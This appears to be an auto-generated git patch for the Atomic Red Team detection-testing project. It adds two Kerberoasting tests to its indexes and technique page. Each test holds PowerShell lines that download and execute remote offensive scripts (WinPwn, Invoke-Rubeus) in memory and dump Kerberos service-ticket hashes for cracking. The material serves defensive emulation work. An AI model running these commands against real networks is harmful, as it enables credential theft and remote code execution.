From 139749aa096af8ee36b8a6d98d0f7c8f45b22085 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Thu, 12 May 2022 23:36:46 +0000 Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 22 +++++++ atomics/T1558.003/T1558.003.md | 63 +++++++++++++++++++ 6 files changed, 93 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 617cf94b..08804262 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -56,6 +56,8 @@ credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497 credential-access,T1558.003,Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt credential-access,T1558.003,Kerberoasting,4,Request A Single Ticket via PowerShell,988539bc-2ed7-4e62-aec6-7c5cf6680863,powershell credential-access,T1558.003,Kerberoasting,5,Request All Tickets via PowerShell,902f4ed2-1aba-4133-90f2-cff6d299d6da,powershell +credential-access,T1558.003,Kerberoasting,6,WinPwn - Kerberoasting,78d10e20-c874-45f2-a9df-6fea0120ec27,powershell +credential-access,T1558.003,Kerberoasting,7,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,29094950-2c96-4cbd-b5e4-f7c65079678f,powershell credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index ef24a636..18669f26 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -41,6 +41,8 @@ credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497 credential-access,T1558.003,Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt credential-access,T1558.003,Kerberoasting,4,Request A Single Ticket via PowerShell,988539bc-2ed7-4e62-aec6-7c5cf6680863,powershell credential-access,T1558.003,Kerberoasting,5,Request All Tickets via PowerShell,902f4ed2-1aba-4133-90f2-cff6d299d6da,powershell +credential-access,T1558.003,Kerberoasting,6,WinPwn - Kerberoasting,78d10e20-c874-45f2-a9df-6fea0120ec27,powershell +credential-access,T1558.003,Kerberoasting,7,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,29094950-2c96-4cbd-b5e4-f7c65079678f,powershell credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell credential-access,T1557.001,LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index c765fbd4..79062e3f 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -82,6 +82,8 @@ - Atomic Test #3: Extract all accounts in use as SPN using setspn [windows] - Atomic Test #4: Request A Single Ticket via PowerShell [windows] - Atomic Test #5: Request All Tickets via PowerShell [windows] + - Atomic Test #6: WinPwn - Kerberoasting [windows] + - Atomic Test #7: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows] - [T1555.001 Keychain](../../T1555.001/T1555.001.md) - Atomic Test #1: Keychain [macos] - [T1056.001 Keylogging](../../T1056.001/T1056.001.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 3ff9be01..5ce6ff4d 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -63,6 +63,8 @@ - Atomic Test #3: Extract all accounts in use as SPN using setspn [windows] - Atomic Test #4: Request A Single Ticket via PowerShell [windows] - Atomic Test #5: Request All Tickets via PowerShell [windows] + - Atomic Test #6: WinPwn - Kerberoasting [windows] + - Atomic Test #7: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows] - [T1056.001 Keylogging](../../T1056.001/T1056.001.md) - Atomic Test #1: Input Capture [windows] - [T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index c64d02a7..a836ee9e 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -3314,6 +3314,28 @@ credential-access: -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } \n" name: powershell + - name: WinPwn - Kerberoasting + auto_generated_guid: 78d10e20-c874-45f2-a9df-6fea0120ec27 + description: Kerberoasting technique via function of WinPwn + supported_platforms: + - windows + executor: + command: |- + $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' + iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') + Kerberoasting -consoleoutput -noninteractive + name: powershell + - name: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus + auto_generated_guid: 29094950-2c96-4cbd-b5e4-f7c65079678f + description: PowerSharpPack - Kerberoasting Using Rubeus technique via function + of WinPwn + supported_platforms: + - windows + executor: + command: |- + iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1') + Invoke-Rubeus -Command "kerberoast /format:hashcat /nowrap" + name: powershell T1555.001: technique: type: attack-pattern diff --git a/atomics/T1558.003/T1558.003.md b/atomics/T1558.003/T1558.003.md index a160ea8c..bdc28154 100644 --- a/atomics/T1558.003/T1558.003.md +++ b/atomics/T1558.003/T1558.003.md @@ -22,6 +22,10 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003) - [Atomic Test #5 - Request All Tickets via PowerShell](#atomic-test-5---request-all-tickets-via-powershell) +- [Atomic Test #6 - WinPwn - Kerberoasting](#atomic-test-6---winpwn---kerberoasting) + +- [Atomic Test #7 - WinPwn - PowerSharpPack - Kerberoasting Using Rubeus](#atomic-test-7---winpwn---powersharppack---kerberoasting-using-rubeus) +
@@ -269,4 +273,63 @@ Write-Host Joining this computer to a domain must be done manually +
+
+ +## Atomic Test #6 - WinPwn - Kerberoasting +Kerberoasting technique via function of WinPwn + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 78d10e20-c874-45f2-a9df-6fea0120ec27 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' +iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') +Kerberoasting -consoleoutput -noninteractive +``` + + + + + + +
+
+ +## Atomic Test #7 - WinPwn - PowerSharpPack - Kerberoasting Using Rubeus +PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 29094950-2c96-4cbd-b5e4-f7c65079678f + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1') +Invoke-Rubeus -Command "kerberoast /format:hashcat /nowrap" +``` + + + + + +